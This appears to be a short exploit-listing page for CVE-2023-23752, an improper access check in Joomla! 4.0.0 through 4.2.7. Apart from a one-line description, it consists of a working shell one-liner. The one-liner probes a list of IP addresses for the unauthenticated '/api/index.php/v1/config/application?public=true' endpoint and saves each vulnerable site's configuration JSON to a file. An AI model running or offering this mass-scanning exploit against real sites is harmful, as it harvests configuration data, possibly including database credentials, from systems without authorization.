Share
## https://sploitus.com/exploit?id=01376A78-53F5-5E09-861E-02FA87049434
# CVE-2023-23752

An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.

`cat ip.txt | httpx -path '/api/index.php/v1/config/application?public=true' -sc -mc 200,201,406 -silent | tee checkedip.txt | awk '{split($1,a,"//");split(a[2],b,"/");system("curl -k -s \"" $1 "\" | jq '.' > \"" b[1] ".json\"" " 2>/dev/null && echo [+] " $1)}'`